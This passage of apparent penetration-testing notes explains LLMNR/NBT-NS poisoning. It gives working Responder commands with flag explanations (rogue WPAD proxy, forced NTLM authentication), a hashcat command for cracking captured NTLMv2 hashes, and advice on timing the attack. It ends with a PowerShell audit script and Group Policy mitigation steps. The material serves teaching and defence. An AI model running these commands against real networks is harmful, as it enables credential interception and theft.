Its older counterpart on legacy networks is NBT-NS. Enabled by default. When DNS fails to resolve a name (a file share, a domain, a mistyped hostname), the host broadcasts a request asking who owns it. Those broadcasts can be intercepted by a man-in-the-middle, and the captured hash can then be cracked offline using something like hashcat and rockyou.txt!
sudo responder -I tun0 -dwPv
-I selects the interface, which is either:
tun0 when working remotely (tunnel 0), or
eth0 when local (ethernet 0).
-dwPv
-d enables answers for DHCP broadcast requests (--DHCP).
-w starts the WPAD rogue proxy server (--wpad). WPAD lets browsers find a proxy without additional config, so they will trust whatever answers.
-P forces NTLM authentication for the proxy. Highly effective (--ProxyAuth).
-v for verbose. Without this, once a hash is captured from a host it is not shown again.
The combined flags -dwPv give an error as of 4/9/2024. Commands that work:
sudo responder -I tun0 -dwv
sudo responder -I tun0 -dPv
To find out what a given -flag means, we can always run
sudo responder --help
Hashcat command:
hashcat -m 5600 hashes.txt rockyou.txt
hashes.txt would include the hashes we want to crack.
The best time to run this (Responder.py) is in the morning or after lunch, when users generate lots of traffic.
Mitigation
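The attack only works while clients still fall back to LLMNR, NBT-NS and WPAD, so the mitigation is to turn those off and verify it stuck. The audit script below is an added example, not part of the original notes; it assumes it is run in an elevated PowerShell session on the Windows host being checked, and it reads the registry values that the corresponding Group Policy settings write (EnableMulticast for LLMNR, per-interface NetbiosOptions for NBT-NS, and the Start value of the WinHttpAutoProxySvc service for WPAD).

```powershell
# Added audit script (not from the original notes): reports whether this host
# still exposes the name-resolution fallbacks that Responder poisons.
# Assumption: elevated PowerShell on the Windows host under review.

function Test-LlmnrDisabled {
    # GPO "Turn off multicast name resolution" writes EnableMulticast = 0 here.
    # A missing value means the policy was never applied, so LLMNR is still on.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    $val = (Get-ItemProperty -Path $key -Name EnableMulticast -ErrorAction SilentlyContinue).EnableMulticast
    return ($val -eq 0)
}

function Test-NbtnsDisabled {
    # NetbiosOptions per interface: 0 = take DHCP's setting, 1 = enabled, 2 = disabled.
    # Every interface must be 2; one chatty adapter is enough for Responder.
    $base = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
    foreach ($iface in Get-ChildItem -Path $base) {
        $opt = (Get-ItemProperty -Path $iface.PSPath -Name NetbiosOptions -ErrorAction SilentlyContinue).NetbiosOptions
        if ($opt -ne 2) { return $false }
    }
    return $true
}

function Test-WpadDisabled {
    # WinHttpAutoProxySvc performs WPAD auto-discovery; Start = 4 means the service is disabled.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\WinHttpAutoProxySvc'
    $start = (Get-ItemProperty -Path $key -Name Start -ErrorAction SilentlyContinue).Start
    return ($start -eq 4)
}

# Summarise the three checks; anything marked EXPOSED is a finding for the report.
$results = [ordered]@{
    'LLMNR disabled'  = Test-LlmnrDisabled
    'NBT-NS disabled' = Test-NbtnsDisabled
    'WPAD disabled'   = Test-WpadDisabled
}
foreach ($entry in $results.GetEnumerator()) {
    $state = if ($entry.Value) { 'OK' } else { 'EXPOSED' }
    '{0,-16} {1}' -f $entry.Key, $state
}
```

Push the fix through Group Policy rather than editing these keys by hand: the DNS Client policy covers LLMNR for every domain member, while NetbiosOptions is per interface and a newly added adapter will come back at the default of 0, so NBT-NS is best disabled through the DHCP scope option or a startup script that re-applies it. Re-run the audit after the policy refresh to confirm nothing silently reverted.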